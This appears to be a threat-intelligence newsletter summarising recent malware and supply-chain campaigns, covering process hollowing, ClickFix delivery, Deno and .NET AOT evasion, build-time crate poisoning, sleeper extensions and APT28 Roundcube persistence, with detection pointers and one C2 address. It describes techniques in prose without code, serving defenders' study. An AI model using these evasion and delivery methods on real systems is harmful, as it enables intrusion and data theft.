ZeroDay Field Notes - Shadows in the Supply Chain

Hey operators, UncleSp1d3r here. Last edition we chewed on some persistent RAT evolutions; today, we're pivoting toward supply-chain sleights of hand and runtime abuses. Lots of interesting technique work this week, so let's get into how these things actually function under the hood.

RAT Races: Process Hollowing and Fileless Chains

Remcos RAT keeps popping up, but this crop of campaigns is worth studying for the execution chain mechanics. A fileless variant uses a multi-stage pipeline: a JavaScript dropper calls out for an AES-encrypted PowerShell payload, which decrypts and loads a .NET injector. That injector performs process hollowing against aspnet_compiler.exe, a legitimate .NET compilation tool that's typically allowlisted.

Process hollowing here works the classic way: spawn aspnet_compiler.exe in a suspended state, call NtUnmapViewOfSection to carve out the legitimate code, write the Remcos payload into the hollowed address space, then resume the thread. The result is a process that looks right in Task Manager and passes most EDR parent-child checks, but its memory contents are entirely attacker-controlled. No file ever hits disk. The only artifacts are the in-memory payload and C2 traffic. Trellix's writeup includes hashes for every stage if you want to pull samples Fileless Multi-Stage Remcos RAT: From Phishing to Memory.

Meanwhile, the ZPHP campaign pushes Remcos via ClickFix social engineering against U.S. SLTT governments. ClickFix is worth understanding as a delivery mechanism: the victim hits a page mimicking Cloudflare Turnstile, which instructs them to open the Windows Run dialog and paste a command. That command is a PowerShell one-liner that pulls the next stage. It's dead simple, but it works because it shifts execution from browser sandbox to user-context shell. CIS documented the SLTT targeting ZPHP Campaign Delivering Remcos RAT Impacting SLTTs.

XWorm v7.1 exploits CVE-2025-8088, a WinRAR path traversal patched in 7.13 last July. The bug abuses NTFS Alternate Data Streams: a crafted archive extracts a payload into an ADS attached to a startup directory entry, so the file is invisible in Explorer but executes at logon. The delivery chain from there mirrors the Remcos pattern: JS to PowerShell to reflective DLL injection into aspnet_compiler.exe. Trellix maps 19 MITRE techniques across the kill chain Malware-As-A-Service Redefined: XWorm RAT.

C2 intel for emulation: XWorm C2 at 204.10.160.190:7003. Both XWorm and fileless Remcos hollow aspnet_compiler.exe. Detection hinges on hooking NtUnmapViewOfSection and correlating it with aspnet_compiler.exe spawning without a corresponding MSBuild or csc.exe parent. If your EDR isn't watching that call in that context, both of these chains fly clean.

Runtime Reapers: Deno Signing Abuse and AOT Compilation Evasion

CastleRAT is the first documented case of abusing the Deno JavaScript runtime for fileless delivery, and the technique is clever. Here's why Deno matters: unlike Node.js, Deno ships as a single signed binary with a valid Authenticode signature. Most EDR reputation engines and application allowlisting tools treat signed binaries from known vendors as trusted. So when Deno executes a malicious script, the process tree looks legitimate.

The payload delivery uses JPEG steganography: the malware embeds encrypted shellcode in the least-significant bits of JPEG pixel data. A PyArmor-obfuscated Python script extracts the hidden bytes, decrypts them, and reflectively loads the result into memory. No intermediate files, no unsigned binaries. Persistence lands in a scheduled task named "VirtualSmokestGuy666" (not subtle, but functional). ThreatDown's analysis has the full chain and C2 indicators CastleRAT attack first to abuse Deno.

Why this is hard to catch: The execution chain is: signed Deno binary runs JS, JS calls Python, Python extracts from JPEG, payload loads reflectively. Every binary in the chain is either signed or a legitimate interpreter. Separate MalBeacon reporting links CastleRAT payloads to Velvet Tempest and Termite ransomware, but via a different ClickFix delivery vector, not the Deno chain.

On the .NET front, Cyderes reversed an AOT-compiled dropper for Rhadamanthys and XMRig. This one matters for a specific technical reason: .NET AOT (Ahead-of-Time) compilation produces a native binary with no IL (Intermediate Language) to decompile. Traditional .NET analysis tools (dnSpy, ILSpy) are useless against it because there's no MSIL bytecode to disassemble. JIT hooks that security tools use to inspect .NET execution at runtime also don't fire, because there's no JIT compilation happening. The binary looks like any native C/C++ executable to static analysis.

The sample also packs anti-VM sandbox scoring: it checks core count, RAM, disk size, and recent file timestamps to assign a "real machine" confidence score before detonating. Cyderes walks through the reversing process in Binary Ninja, which is a useful reference if you're building methodology for native .NET analysis Reverse Engineering .NET AOT Malware.

Supply-Chain Shenanigans: Build-Time Poisoning and Extension Sleepers

The Contagious Trader campaign is a textbook study in supply-chain indirection. The attack surface is npm packages and GitHub repos posing as crypto trading bots. What makes the technique interesting is the Rust crate layer: the npm packages declare build dependencies on Rust crates that look benign in source review. The malicious logic only materializes at build time, when the crate's build.rs script pulls encrypted payloads from an external host, decrypts them, and compiles them into the final binary. Your dependency scanner sees clean source; the compiled output contains an SSH implant and exfil tooling.

KMSEC's analysis attributes this to Lazarus/FAMOUS CHOLLIMA and documents OPSEC slips including Astrill VPN exit node IPs that map back to known DPRK infrastructure. Over 30 repos, 37 packages, full C2 topology in the writeup Contagious Trader campaign.

Why this is hard to catch: The malicious code never exists in the source repository. It's fetched and compiled at build time by the Rust toolchain. Auditing the crate source shows nothing; you'd need to intercept the network calls during cargo build or diff the compiled output against expected behavior. The Astrill VPN IPs are a hunting pivot if you're working attribution.

A related DPRK stager uses text steganography in Pastebin: payloads are encoded as invisible Unicode characters (zero-width joiners, variation selectors) embedded in normal-looking text posts. The stager fetches the paste, strips visible characters, decodes the hidden ones, and executes the result. It's a neat C2/staging trick because the Pastebin content passes casual inspection and most automated content scanning Novel DPRK stager.

GlassWorm demonstrates another indirection pattern: extensions published to Open VSX sit dormant until a timed update flips them active. The updated extension doesn't contain the payload directly; instead, it downloads a VSIX package from a GitHub release artifact and sideloads it. This two-hop delivery (registry to GitHub to payload) means the registry's malware scanning only ever sees the clean loader. Socket documented the activation mechanics across 72+ extensions, including one that used Google Calendar API as a C2 channel for tasking GlassWorm Sleeper Extensions.

Espionage Echoes: Persistence Tricks from State Actors

FancyBear's OPSEC fumble this week exposed an open directory containing their toolkit for Roundcube exploitation via CVE-2023-43770 (a stored XSS in how Roundcube renders link references in plain-text emails). The leaked tools show the post-exploitation playbook: inject JavaScript that steals TOTP secrets, creates email forwarding rules to an attacker mailbox, and dumps the address book. The XSS fires every time the victim views the crafted email, so persistence is tied to the message sitting in their inbox FancyBear Exposed.

The related Operation Roundish analysis reveals the httd implant, a 5.2 MB statically compiled Go binary disguised as an HTTP daemon. What's interesting is its persistence layering: on standard Linux it drops a cron job running every minute as root; on systemd hosts it installs a service named linux.service from /boot; on SELinux-enforcing systems it generates and loads a custom policy module using audit2allow to whitelist its own execution. Three persistence mechanisms in one binary, auto-selected based on the target environment Operation Roundish: Uncovering an APT28 Roundcube Exploitation Toolkit.

StoatWaffle from WaterPlum (DPRK-linked) chains PowerShell to Node.js for exfil through VSCode extension repos, using WSL as a bridging environment between Windows and Linux execution contexts. NTT's analysis covers the loader stages WaterPlumが使用するマルウェアStoatWaffle.

CamelClone uses LNK files that invoke Rclone for MEGA cloud exfiltration, a living-off-the-land approach where the exfil tool is a legitimate, signed file sync utility Government Entities Targeted By CamelClone.

Quick Hits

Tinycontrol IoT (CVE-2025-11500): Login page returns a JSON blob containing encoded (not hashed) credentials to unauthenticated HTTP requests. Weak encoding (CWE-261), local network only Vulnerabilities in multiple tinycontrol devices.

Storm-2561: SEO-poisoned sites impersonate VPN vendors, serve DLL sideloading packages where a signed binary loads a malicious DLL (Hyrax infostealer). Microsoft published Yara rules Storm-2561 Uses SEO Poisoning.

Fake Telegram sites: In-memory RAT delivery via rundll32 injection Fake Telegram Site.

COVERT RAT: GitHub-hosted payloads with Rust-based evasion targeting Argentina's judiciary COVERT RAT Delivered.

GoPix: Brazilian banking trojan using memory-only implants and non-standard port C2 to manipulate transactions GoPix banking Trojan.

Slopoly: IBM X-Force documents LLM-generated C2 code for Hive0163 ransomware operations. The generated code is functional but stylistically distinct from human-written malware, which is itself a detection signal A Slopoly start.

FortiGate edge intrusions: Multiple CVEs chained for SSO credential theft. SentinelOne's DFIR walkthrough covers the forensic artifacts Hackers Exploit FortiGate.

Perseus Android DTO: Abuses Accessibility Services to read notification content and screen text; distributed as fake IPTV apps Perseus: DTO malware.

Closing Cipher

Big theme this week: indirection. Every interesting chain here adds a layer between the malicious intent and the observable artifact: build-time crate fetches, JPEG stego, signed runtime abuse, sleeper extension updates, ADS path traversal. The technical trend is clear: the payload is never where the scanner is looking. Stay frosty out there.

~ UncleSp1d3r